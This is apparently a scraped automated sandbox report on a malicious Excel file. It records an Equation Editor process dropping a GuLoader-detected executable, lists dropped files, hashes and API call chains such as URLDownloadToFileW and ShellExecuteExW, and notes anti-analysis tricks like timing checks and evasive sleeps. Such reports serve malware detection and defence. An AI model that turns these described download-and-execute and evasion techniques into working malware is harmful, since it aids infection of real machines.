Source:	Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.1176745536.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_708A30C0 push eax; ret

4_2_708A30EE

PE file contains sections with non-standard names

Source: wxbase30u_xml_gcc_custom.dll.4.dr

Static PE information: section name: .xdata

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_708A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_708A1BFF

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nszEA61.tmp\System.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_0342056E

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 852

Thread sleep time: -360000s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406850 FindFirstFileW,FindClose,	4_2_00406850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C26
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node

Source: vbc.exe, 00000004.00000002.1176666558.00000000009EF000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_708A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_708A1BFF

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03420677 mov edx, dword ptr fs:[00000030h]

2_2_03420677

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040350A

ID:	623901
Product:	CloudBasic
Start time:	22:15:36
Start date:	10.05.2022
Sample:	OR17233976_00019489_20170619154218.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	06f4851cbdc105cc140818b42f000b0e
SHA1:	40ac7c31fd3e2f3524bd82200491741f02f9a1ef
SHA256:	3844f8a2b3657d0141d505373f74beb01b6c2150c6931670bc241d600dca89eb
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	78003B1DD8F6229A23A13087082E259C	8A9998FEAE97C83883C682457E06E01A5F49C28A	784D3F82BACA5B823EE950DF8A640E1D5A1C1EE75B78A3C26ABDA15A99A204F3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3288E575.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\53BF4B19.wmf	ms-windows metafont .wmf	A549AA7F97898B261149683461DAA5B3	23FC6A9681D1EC42968FA9B7FDC3A39704D9A5A8	0D8148A90146940BDEA33C016EF7472F2A2A98DC81B93642B3C0BE96F556CCDB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76413093.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90EF2157.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	E780029FC510263ADBCDCB722EE175DB	DBB31FE31A18F06E033C87CAAAEAB6B5447FDECB	B3D61080037707B77D1F08BEA2B282E985D0D186B8E6B743B3141E590AC2875D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4D6F58F.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 150x150, frames 3	C96C0C48B8618E6C3900BA7A247F8CBA	F26FAC99A47B00164D9B57FB24904F9E29777229	8F82582426E79EC967B238F609F485DAB0AB8C7C4CB14BF9B40050D33C42E782
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9050978.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9F9AC7D.wmf	ms-windows metafont .wmf	F5131B0D4BE02F6DBFB64313921574AF	A8116CEC8B593BB4B30E7190A7897264BFFBDBBF	5AF63109E000FA6F97D157AE1AA499C053762479BAD6FEFC3433C3554669AB11
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C49C905A.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 150x150, frames 3	C96C0C48B8618E6C3900BA7A247F8CBA	F26FAC99A47B00164D9B57FB24904F9E29777229	8F82582426E79EC967B238F609F485DAB0AB8C7C4CB14BF9B40050D33C42E782
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE13C646.wmf	ms-windows metafont .wmf	F5131B0D4BE02F6DBFB64313921574AF	A8116CEC8B593BB4B30E7190A7897264BFFBDBBF	5AF63109E000FA6F97D157AE1AA499C053762479BAD6FEFC3433C3554669AB11
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFB87244.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4EC5B6C.wmf	ms-windows metafont .wmf	A549AA7F97898B261149683461DAA5B3	23FC6A9681D1EC42968FA9B7FDC3A39704D9A5A8	0D8148A90146940BDEA33C016EF7472F2A2A98DC81B93642B3C0BE96F556CCDB
C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	00B917A158BB5BF0D6BFF7D6B3C81B12	24A9B80C8EC794ADA4C8BAF717CFAB98459AC1DE	947BE059906893C09F222CB2868631638A219FB905A47E16A311BA5ADEB4B300
C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	0B849C073801DCE25301ECA0146D534B	5BB9251CA83FE96C8F52B35637E674A629ED1468	3F77E9EF8843DE3DA37037F21BCF6D7E990085D2BDC5B3F05E71AB5EBE5288BB
C:\Users\user\AppData\Local\Temp\CoverDes.exe.manifest	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	9B48061E7B9FC35CD2624F2B9102549E	9DA640A8AF809549031916AB143026FAAF3B1E74	84839C6E85F9B73AA6B0F331A9EAADF7409B7B36E30BA0B04E31680069103E43
C:\Users\user\AppData\Local\Temp\Uforholdsvises7.wad	data	B021F3197225409A4EC77E8ED259532E	B9B2356B156F047E578910BB77995013E633B28E	749CCBEA3A290F99C225992CFFBEFECC11E47B1A50208F8D2D1EFDBF45F9C4F2
C:\Users\user\AppData\Local\Temp\emblem-default-symbolic.symbolic.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	A83F8C904AFA9E3F6A50D263747CF6DF	7B9D99B950518FCAF5AC59350823D2B20E82956F	F57C0B31EC836E26EB609F259CFA68DDA95F09685784423B61075DAE4BBA5BF6
C:\Users\user\AppData\Local\Temp\face-crying.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	473EE416AF2C1AE05AA7D5D004C9B3D2	EEC352E25F562C0386D5C92384A70B3005D40D6F	2C48F1719BBC825592FB0929E31DCFE66578665D28099087EA98EF261688DC18
C:\Users\user\AppData\Local\Temp\nszEA61.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	CFF85C549D536F651D4FB8387F1976F2	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows	6D01A897D44DD4D25D7E1264407210FD	332C3ADE84D0C1E5BE298C037F9FE222620343B2	DD8289A21902F458B861C08A2F54D23F1E214B37BB89E73D4108303B490F7644
C:\Users\user\AppData\Local\Temp\~DF356FB6003FFB313F.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF6D478D5B0CAAFC00.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFE089B71C9CC2CAF5.TMP	CDFV2 Encrypted	06F4851CBDC105CC140818B42F000B0E	40AC7C31FD3E2F3524BD82200491741F02F9A1EF	3844F8A2B3657D0141D505373F74BEB01B6C2150C6931670BC241D600DCA89EB
C:\Users\user\AppData\Local\Temp\~DFEBF9B8A93FED7DB2.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\~$OR17233976_00019489_20170619154218.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	78003B1DD8F6229A23A13087082E259C	8A9998FEAE97C83883C682457E06E01A5F49C28A	784D3F82BACA5B823EE950DF8A640E1D5A1C1EE75B78A3C26ABDA15A99A204F3

Windows Analysis Report
OR17233976_00019489_20170619154218.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report OR17233976_00019489_20170619154218.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
OR17233976_00019489_20170619154218.xlsx